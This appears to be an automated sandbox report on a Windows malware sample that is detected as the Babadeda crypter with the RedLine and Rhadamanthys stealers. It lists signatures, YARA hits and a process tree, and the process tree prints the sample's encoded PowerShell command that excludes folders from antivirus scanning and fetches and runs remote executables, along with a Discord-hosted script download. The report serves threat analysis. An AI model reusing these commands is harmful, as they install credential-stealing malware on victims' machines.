Edit tour
Windows
Analysis Report
setup.exe
Overview
General Information
| Sample name: | setup.exe |
| Analysis ID: | 1468866 |
| MD5: | b5e479d3926b22b59926050c29c4e761 |
| SHA1: | a456cc6993d12abe6c44f2d453d7ae5da2029e24 |
| SHA256: | fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b |
| Tags: | exe |
| Infos: |   |
 | |
Detection
Babadeda, RHADAMANTHYS, RedLine
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops large PE files
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
setup.exe (PID: 7488 cmdline: "C:\Users\ user\Deskt op\setup.e xe" MD5: B5E479D3926B22B59926050C29C4E761) 
powershell.exe (PID: 7548 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EncodedCo mmand "PAA jAGIAagBpA CMAPgAgAEE AZABkAC0AT QBwAFAAcgB lAGYAZQByA GUAbgBjAGU AIAA8ACMAZ wBhAHAAIwA +ACAALQBFA HgAYwBsAHU AcwBpAG8Ab gBQAGEAdAB oACAAQAAoA CQAZQBuAHY AOgBVAHMAZ QByAFAAcgB vAGYAaQBsA GUALAAkAGU AbgB2ADoAU wB5AHMAdAB lAG0ARAByA GkAdgBlACk AIAA8ACMAe gBrAGQAIwA +ACAALQBGA G8AcgBjAGU AIAA8ACMAa ABlAHAAIwA +ADsAJAB3A GMAIAA9ACA AKABOAGUAd wAtAE8AYgB qAGUAYwB0A CAAUwB5AHM AdABlAG0AL gBOAGUAdAA uAFcAZQBiA EMAbABpAGU AbgB0ACkAO wAkAGwAbgB rACAAPQAgA CQAdwBjAC4 ARABvAHcAb gBsAG8AYQB kAFMAdAByA GkAbgBnACg AJwBoAHQAd ABwAHMAOgA vAC8AcgBlA G4AdAByAHk ALgBvAHIAZ wAvAGwAZQB tADYAMQAxA DEAMQAxADE AMQAxADEAM QAvAHIAYQB 3ACcAKQAuA FMAcABsAGk AdAAoAFsAc wB0AHIAaQB uAGcAWwBdA F0AIgBgAHI AYABuACIAL AAgAFsAUwB 0AHIAaQBuA GcAUwBwAGw AaQB0AE8Ac AB0AGkAbwB uAHMAXQA6A DoATgBvAG4 AZQApADsAI AAkAGYAbgA gAD0AIABbA FMAeQBzAHQ AZQBtAC4AS QBPAC4AUAB hAHQAaABdA DoAOgBHAGU AdABSAGEAb gBkAG8AbQB GAGkAbABlA E4AYQBtAGU AKAApADsAI ABmAG8AcgA gACgAJABpA D0AMAA7ACA AJABpACAAL QBsAHQAIAA kAGwAbgBrA C4ATABlAG4 AZwB0AGgAO wAgACQAaQA rACsAKQAgA HsAIAAkAHc AYwAuAEQAb wB3AG4AbAB vAGEAZABGA GkAbABlACg AJABsAG4Aa wBbACQAaQB dACwAIAA8A CMAbgBtAHk AIwA+ACAAK ABKAG8AaQB uAC0AUABhA HQAaAAgADw AIwBjAHAAZ wAjAD4AIAA tAFAAYQB0A GgAIAAkAGU AbgB2ADoAQ QBwAHAARAB hAHQAYQAgA DwAIwBqAGk AZwAjAD4AI AAtAEMAaAB pAGwAZABQA GEAdABoACA AKAAkAGYAb gAgACsAIAA kAGkALgBUA G8AUwB0AHI AaQBuAGcAK AApACAAKwA gACcALgBlA HgAZQAnACk AKQApACAAf QA8ACMAYgB 3AGYAIwA+A DsAIABmAG8 AcgAgACgAJ ABpAD0AMAA 7ACAAJABpA CAALQBsAHQ AIAAkAGwAb gBrAC4ATAB lAG4AZwB0A GgAOwAgACQ AaQArACsAK QAgAHsAIAB TAHQAYQByA HQALQBQAHI AbwBjAGUAc wBzACAALQB GAGkAbABlA FAAYQB0AGg AIAA8ACMAb gB6AHoAIwA +ACAAKABKA G8AaQBuAC0 AUABhAHQAa AAgAC0AUAB hAHQAaAAgA CQAZQBuAHY AOgBBAHAAc ABEAGEAdAB hACAAPAAjA HEAdQBhACM APgAgAC0AQ wBoAGkAbAB kAFAAYQB0A GgAIAAoACQ AZgBuACAAK wAgACQAaQA uAFQAbwBTA HQAcgBpAG4 AZwAoACkAI AArACAAJwA uAGUAeABlA CcAKQApACA AfQAgADwAI wBpAGQAegA jAD4A" MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 7556 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
okdtlfsk.k4u0.exe (PID: 4956 cmdline: "C:\Users\ user\AppDa ta\Roaming \okdtlfsk. k4u0.exe" MD5: CEE45150AF795124C072DDF8AB9EEE0E) - conhost.exe (PID: 5312 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
okdtlfsk.k4u1.exe (PID: 3168 cmdline: "C:\Users\ user\AppDa ta\Roaming \okdtlfsk. k4u1.exe" MD5: 448E72D5B4A0AB039607CBAF93707732) 
OpenWith.exe (PID: 7972 cmdline: "C:\Window s\system32 \openwith. exe" MD5: 0ED31792A7FFF811883F80047CBCFC91) - okdtlfsk.k4u2.exe (PID: 5844 cmdline:
"C:\Users\ user\AppDa ta\Roaming \okdtlfsk. k4u2.exe" MD5: A3B2FCF0C05BB385115894D38C2E6C44) - cmd.exe (PID: 7496 cmdline:
"C:\Window s\sysnativ e\cmd.exe" /c "C:\Us ers\user\A ppData\Loc al\Temp\20 30.tmp\203 1.tmp\2032 .bat C:\Us ers\user\A ppData\Roa ming\okdtl fsk.k4u2.e xe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - where.exe (PID: 1196 cmdline:
where node MD5: 3CF958B0F63FB1D74F7FCFE14B039A58) - powershell.exe (PID: 4588 cmdline:
powershell -Command "Invoke-We bRequest - Uri 'https ://nodejs. org/dist/v 20.12.2/no de-v20.12. 2-x64.msi' -OutFile 'nodejs-in staller.ms i'" MD5: 04029E121A0CFA5991749937DD22A1D9) 
msiexec.exe (PID: 732 cmdline: msiexec /i nodejs-in staller.ms i /quiet MD5: E5DA170027542E25EDE42FC54C929077) - powershell.exe (PID: 7012 cmdline:
powershell -Command "Invoke-We bRequest - Uri 'https ://cdn.dis cordapp.co m/attachme nts/124919 2949389201 463/124919 2988895350 794/index. js?ex=666d a961&is=66 6c57e1&hm= 18936ed8d9 532b88193b 485814d4fa e218130543 1d8e870870 aab77fc153 e162&' -Ou tFile 'C:\ Users\user \AppData\L ocal\Temp\ chrome2\in dex.js'" MD5: 04029E121A0CFA5991749937DD22A1D9) 
okdtlfsk.k4u3.exe (PID: 6300 cmdline: "C:\Users\ user\AppDa ta\Roaming \okdtlfsk. k4u3.exe" MD5: 8578F7C0977818E0A940AB0B9F227B33) - Steam.exe (PID: 5144 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\St eam\Steam. exe" MD5: F040B4DE6F293D0B5B801A8E24CCA145) 
cscript.exe (PID: 4336 cmdline: cscript.ex e MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD) - conhost.exe (PID: 2704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Steam.exe (PID: 8108 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\St eam\Steam. exe" --typ e=gpu-proc ess --user -data-dir= "C:\Users\ user\AppDa ta\Roaming \Steam" -- gpu-prefer ences=WAAA AAAAAADgAA AMAAAAAAAA AAAAAAAAAA BgAAEAAAA4 AAAAAAAAAA AAAAAEAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAGAAAAAAA AAAYAAAAAA AAAAgAAAAA AAAACAAAAA AAAAAIAAAA AAAAAA== - -field-tri al-handle= 1696,i,165 5796347146 8826308,12 0202948161 36511924,2 62144 --en able-featu res=kWebSQ LAccess -- disable-fe atures=Spa reRenderer ForSitePer Process,Wi nDelaySpel lcheckServ iceInit,Wi nRetrieveS uggestions OnlyOnDema nd --varia tions-seed -version - -mojo-plat form-chann el-handle= 1684 /pref etch:2 MD5: F040B4DE6F293D0B5B801A8E24CCA145) - cscript.exe (PID: 7908 cmdline:
cscript.ex e //Nologo C:\Users\ user\AppDa ta\Local\P rograms\St eam\resour ces\app.as ar.unpacke d\node_mod ules\reged it\vbs\reg List.wsf A HKCU\Soft ware\Valve \Steam MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD) - conhost.exe (PID: 4116 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Steam.exe (PID: 2344 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\St eam\Steam. exe" --typ e=utility --utility- sub-type=n etwork.moj om.Network Service -- lang=en-GB --service -sandbox-t ype=none - -user-data -dir="C:\U sers\user\ AppData\Ro aming\Stea m" --field -trial-han dle=2456,i ,165579634 7146882630 8,12020294 8161365119 24,262144 --enable-f eatures=kW ebSQLAcces s --disabl e-features =SpareRend ererForSit ePerProces s,WinDelay Spellcheck ServiceIni t,WinRetri eveSuggest ionsOnlyOn Demand --v ariations- seed-versi on --mojo- platform-c hannel-han dle=2356 / prefetch:3 MD5: F040B4DE6F293D0B5B801A8E24CCA145)
- svchost.exe (PID: 5924 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msiexec.exe (PID: 3588 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 2852 cmdline:
C:\Windows \System32\ MsiExec.ex e -Embeddi ng 933007F 3F47C18EFD BF07080B43 D7822 MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 7804 cmdline:
C:\Windows \System32\ MsiExec.ex e -Embeddi ng E900A44 71D84F90E9 185A9C7E4B 35274 E Gl obal\MSI00 00 MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 6724 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 3B1C806 2EAD881799 860A5FD745 359D4 MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Babadeda | According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
| JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
| Click to see the 8 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Babadeda | Yara detected Babadeda | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| Click to see the 2 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||